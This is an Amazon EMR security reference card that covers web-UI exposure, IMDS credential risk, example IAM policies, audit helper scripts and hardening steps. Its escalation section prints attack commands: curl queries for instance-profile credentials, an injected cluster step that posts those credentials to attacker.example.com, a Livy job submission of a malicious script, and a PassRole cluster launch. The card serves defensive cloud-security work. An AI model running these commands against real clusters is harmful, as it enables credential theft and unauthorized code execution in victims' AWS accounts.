Amazon EMR (Elastic MapReduce) runs Apache Spark, Hadoop, Hive, Presto, and other big data frameworks on EC2 clusters. IMDS credential theft, exposed web interfaces, and over-privileged instance profiles are the primary attack surface.
EMR cluster nodes are EC2 instances with an instance profile (default: EMR_EC2_DefaultRole) that grants S3 access through EMRFS. Each node exposes the EC2 Instance Metadata Service at 169.254.169.254. IMDSv1 is vulnerable to SSRF-based credential theft.
Attack note: Any code running on an EMR cluster node can query IMDS to obtain the EC2 instance profile credentials, which typically include broad S3 access.
EMR clusters host many web interfaces, including: YARN ResourceManager (8088), Spark History Server (18080), Livy REST API (8998), Hue (8888), JupyterHub (9443), Zeppelin (8890), Ganglia (80), Tez UI (8080), HBase (16010), Flink History Server (8082), HDFS NameNode (9870).
Attack note: Livy (port 8998) accepts unauthenticated REST API calls to execute arbitrary code on the cluster if exposed to the network.
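One way to check for this kind of exposure is to scan a cluster's security group rules for the UI ports listed above. The following is a minimal sketch, not a complete audit: it assumes the rules have the shape of the IpPermissions list returned by aws ec2 describe-security-groups, and the function name exposed_ui_ports is hypothetical.

```python
# Ports taken from the web-interface list above.
EMR_UI_PORTS = {
    8088: "YARN ResourceManager",
    18080: "Spark History Server",
    8998: "Livy REST API",
    8888: "Hue",
    9443: "JupyterHub",
    8890: "Zeppelin",
    80: "Ganglia",
    8080: "Tez UI",
    16010: "HBase",
    8082: "Flink History Server",
    9870: "HDFS NameNode",
}

OPEN_CIDRS = ("0.0.0.0/0", "::/0")


def exposed_ui_ports(ip_permissions):
    """Return {port: service} for EMR UI ports open to any source address.

    ip_permissions is assumed to follow the IpPermissions shape from
    `aws ec2 describe-security-groups` (an assumption of this sketch).
    """
    exposed = {}
    for rule in ip_permissions:
        cidrs = [r.get("CidrIp") for r in rule.get("IpRanges", [])]
        cidrs += [r.get("CidrIpv6") for r in rule.get("Ipv6Ranges", [])]
        if not any(c in OPEN_CIDRS for c in cidrs):
            continue  # rule is not open to the whole internet
        proto = rule.get("IpProtocol")
        if proto == "-1":  # "-1" means all protocols and all ports
            low, high = 0, 65535
        elif proto == "tcp":
            low, high = rule["FromPort"], rule["ToPort"]
        else:
            continue  # the UIs listed above are TCP services
        for port, service in EMR_UI_PORTS.items():
            if low <= port <= high:
                exposed[port] = service
    return exposed
```

The sketch only considers rules open to 0.0.0.0/0 or ::/0; a broad internal CIDR can still expose Livy to untrusted hosts inside the network and would need a separate check.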
EMR clusters run arbitrary code by design, combine multiple EC2 instances with shared credentials, expose numerous unauthenticated web interfaces, and often have instance profiles with broad S3 access. Unless a security configuration enables encryption, data at rest and in transit is left unprotected.
aws emr list-clusters --active
aws emr describe-cluster --cluster-id j-XXXXXXXXXXXXX
aws emr list-security-configurations
aws emr describe-security-configuration \
  --name my-security-config
aws emr list-steps --cluster-id j-XXXXXXXXXXXXX
aws emr describe-cluster --cluster-id j-XXXXXXXXXXXXX \
  --query 'Cluster.BootstrapActions'
aws emr list-instances --cluster-id j-XXXXXXXXXXXXX
aws emr get-block-public-access-configuration
aws emr get-cluster-session-credentials \
  --cluster-id j-XXXXXXXXXXXXX \
  --execution-role-arn arn:aws:iam::123456789012:role/MyExecRole
Key insight: EMR clusters execute arbitrary code by design. The real privilege escalation risk is the gap between "can submit code to the cluster" and "the permissions the cluster's instance profile grants in AWS."
# From any cluster node: query IMDS for the instance profile credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns role name, then:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# With elasticmapreduce:AddJobFlowSteps: inject a step into a running cluster
aws emr add-steps --cluster-id j-XXXXXXXXXXXXX \
  --steps Type=CUSTOM_JAR,Name=Exfil,Jar=command-runner.jar,Args=[bash,-c,"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/creds && curl -X POST -d @/tmp/creds https://attacker.example.com/collect"]
# With network access to an exposed Livy endpoint: submit a batch job
curl -X POST -H "Content-Type: application/json" \
  http://<emr-primary-node>:8998/batches \
  -d '{"file": "s3://attacker-bucket/malicious.py"}'
# With elasticmapreduce:RunJobFlow and iam:PassRole: launch a cluster under a more privileged instance profile
aws emr create-cluster --name "escalation" \
  --release-label emr-6.15.0 \
  --instance-type m5.xlarge --instance-count 1 \
  --ec2-attributes InstanceProfile=HighPrivilegeRole \
  --service-role EMR_DefaultRole \
  --steps Type=CUSTOM_JAR,Name="cmd",Jar="command-runner.jar",Args=["aws","s3","ls"]
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "elasticmapreduce:AddJobFlowSteps",
      "elasticmapreduce:RunJobFlow"
    ],
    "Resource": "*"
  }]
}
Allows injecting arbitrary code steps into any EMR cluster or launching new clusters
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "elasticmapreduce:DescribeCluster",
      "elasticmapreduce:ListSteps",
      "elasticmapreduce:ListInstances"
    ],
    "Resource": "arn:aws:elasticmapreduce:eu-west-1:123456789012:cluster/*",
    "Condition": {
      "StringEquals": {
        "aws:ResourceTag/Environment": "production"
      }
    }
  }]
}
Read-only access scoped to tagged clusters in a specific region
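The difference between the two EMR policies above can be checked mechanically. The following is a rough heuristic sketch, assuming the policy has already been parsed into a Python dict; the function name unscoped_code_exec_grants is hypothetical, and the check ignores Deny statements, NotAction, and permission boundaries, so it is not a substitute for real policy evaluation.

```python
from fnmatch import fnmatchcase

# Actions that let a principal run code on a cluster (from the policy above).
CODE_EXEC_ACTIONS = (
    "elasticmapreduce:AddJobFlowSteps",
    "elasticmapreduce:RunJobFlow",
)


def _as_list(value):
    """IAM allows a single string or object where a list is also valid."""
    return value if isinstance(value, list) else [value]


def unscoped_code_exec_grants(policy):
    """Return code-execution actions allowed on Resource "*" with no Condition."""
    findings = set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Condition" in stmt:
            continue
        if "*" not in _as_list(stmt.get("Resource", [])):
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            for action in CODE_EXEC_ACTIONS:
                # IAM action names are case-insensitive and may use wildcards.
                if fnmatchcase(action.lower(), pattern.lower()):
                    findings.add(action)
    return sorted(findings)
```

Matching with wildcards means a grant such as elasticmapreduce:* is reported as well, since it implicitly includes both code-execution actions.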
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": "s3:*",
    "Resource": "*"
  }]
}
Any code on the cluster can read/write/delete any S3 object in the account
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "s3:GetObject",
      "s3:ListBucket"
    ],
    "Resource": [
      "arn:aws:s3:::my-data-lake-bucket",
      "arn:aws:s3:::my-data-lake-bucket/approved-prefix/*"
    ]
  }]
}
Instance profile limited to read-only access on specific S3 prefixes
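To tell the broad and the scoped instance profile policies apart in bulk, a simple scan for S3 wildcards can help. This is a minimal sketch under the assumption that each policy is available as a parsed dict; s3_wildcard_findings is a hypothetical helper name, and the check only looks at literal wildcards in Allow statements.

```python
def _as_list(value):
    """Accept either a single string/object or a list, as IAM JSON does."""
    return [value] if isinstance(value, (str, dict)) else list(value)


def s3_wildcard_findings(policy):
    """Return (statement_index, issue) pairs for over-broad S3 grants."""
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        resources = _as_list(stmt.get("Resource", []))
        if not any(a == "*" or a.startswith("s3:") for a in actions):
            continue  # statement does not grant any S3 action
        if any(a in ("*", "s3:*") for a in actions):
            findings.append((index, "wildcard action"))
        if any(r in ("*", "arn:aws:s3:::*") for r in resources):
            findings.append((index, "wildcard resource"))
    return findings
```

An empty result does not prove least privilege; a policy can still name far more buckets or prefixes than the cluster needs.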
Require IMDSv2 session tokens to block SSRF-based credential theft from cluster applications. Use an EC2 launch template with MetadataOptions: {HttpTokens: required, HttpPutResponseHopLimit: 1}.
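The reason session tokens help is visible in the request shapes: IMDSv2 needs a PUT with a custom header before any metadata can be read, which a typical SSRF primitive (a plain GET to an attacker-chosen URL) usually cannot issue. The sketch below only builds the two requests and sends nothing; the helper names token_request and metadata_request are hypothetical.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254/latest"


def token_request(ttl_seconds=21600):
    """Build the PUT request that asks IMDSv2 for a session token."""
    return urllib.request.Request(
        f"{IMDS_BASE}/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path, token):
    """Build a GET request for a metadata path that carries the token."""
    return urllib.request.Request(
        f"{IMDS_BASE}/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


# On an instance, the flow would look like this (not executed here):
#   token = urllib.request.urlopen(token_request(), timeout=2).read().decode()
#   body = urllib.request.urlopen(
#       metadata_request("iam/security-credentials/", token), timeout=2).read()
```

Code that already runs on a node can still complete this flow, so IMDSv2 narrows the SSRF path but does not replace a least-privilege instance profile.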
Create a security configuration that enables encryption for S3 data (SSE-KMS), local disk (LUKS), and in-transit (TLS).
# Abbreviated: a working configuration must also include the AtRestEncryptionConfiguration and InTransitEncryptionConfiguration blocks
aws emr create-security-configuration \
  --name "encryption-config" \
  --security-configuration '{
    "EncryptionConfiguration": {
      "EnableInTransitEncryption": true,
      "EnableAtRestEncryption": true
    }
  }'
Verify that block public access (BPA) is enabled, which is the default. BPA prevents launching clusters whose security groups allow public inbound traffic on any port that is not listed as an exception (by default, only SSH on port 22).
aws emr get-block-public-access-configuration
Place EMR clusters in private subnets with no public IP addresses. Use SSH tunnels, VPN, or an ALB with authentication for web UI access.
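The block public access verification can be automated against the JSON that aws emr get-block-public-access-configuration prints. The following is a minimal sketch, assuming that output has been captured as a string; bpa_findings is a hypothetical helper name and the default allow-list of port 22 is an assumption of this sketch.

```python
import json


def bpa_findings(cli_output, allowed_ports=frozenset({22})):
    """Return a list of problems found in a block public access configuration."""
    config = json.loads(cli_output)["BlockPublicAccessConfiguration"]
    findings = []
    if not config.get("BlockPublicSecurityGroupRules", False):
        findings.append("block public access is disabled")
    for rng in config.get("PermittedPublicSecurityGroupRuleRanges", []):
        low = rng["MinRange"]
        high = rng.get("MaxRange", low)  # treat a missing MaxRange as a single port
        # Flag any exception range that covers ports outside the allow-list.
        if any(port not in allowed_ports for port in range(low, high + 1)):
            findings.append(f"public exception for ports {low}-{high}")
    return findings
```

An empty list means the setting is on and the only permitted public ports are those in allowed_ports; it says nothing about security groups attached to clusters that were launched before BPA was enabled.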
Configure Kerberos for user-level authentication so individual users are authenticated before accessing cluster services.
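# <kerberos-security-config> is a placeholder for a security configuration with Kerberos enabled; instance options are omitted
aws emr create-cluster --name "kerberized-cluster" \
  --release-label emr-6.15.0 \
  --security-configuration <kerberos-security-config> \
  --kerberos-attributes Realm=EXAMPLE.COM,KdcAdminPassword=<password>
Configure EMRFS IAM role mappings so different users or groups assume different roles when accessing S3 through EMRFS.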
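EMRFS role mappings are declared in a security configuration under AuthorizationConfiguration. The sketch below generates that JSON from a list of mappings; the helper name emrfs_role_mapping_config and the role ARNs in the usage note are hypothetical, and the resulting document should be checked against the current EMR documentation before use.

```python
import json

# Identifier types EMRFS role mappings accept.
IDENTIFIER_TYPES = {"User", "Group", "Prefix"}


def emrfs_role_mapping_config(mappings):
    """Build security-configuration JSON for EMRFS role mappings.

    mappings is a list of (role_arn, identifier_type, identifiers) tuples.
    """
    role_mappings = []
    for role_arn, identifier_type, identifiers in mappings:
        if identifier_type not in IDENTIFIER_TYPES:
            raise ValueError(f"unsupported identifier type: {identifier_type}")
        role_mappings.append({
            "Role": role_arn,
            "IdentifierType": identifier_type,
            "Identifiers": list(identifiers),
        })
    config = {
        "AuthorizationConfiguration": {
            "EmrFsConfiguration": {"RoleMappings": role_mappings}
        }
    }
    return json.dumps(config, indent=2)
```

For example, emrfs_role_mapping_config([("arn:aws:iam::123456789012:role/AnalystS3Role", "Group", ["analysts"])]) yields a document that could be passed to aws emr create-security-configuration via --security-configuration.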
Deploy Apache Knox as a perimeter gateway to authenticate and proxy web interface traffic instead of directly exposing YARN, Spark UI, Livy, and other endpoints.
Replace the default EMR_EC2_DefaultRole with a custom role that grants access only to the specific S3 buckets and prefixes the cluster needs.
Amazon EMR Security Card • Toc Consulting
Always obtain proper authorization before testing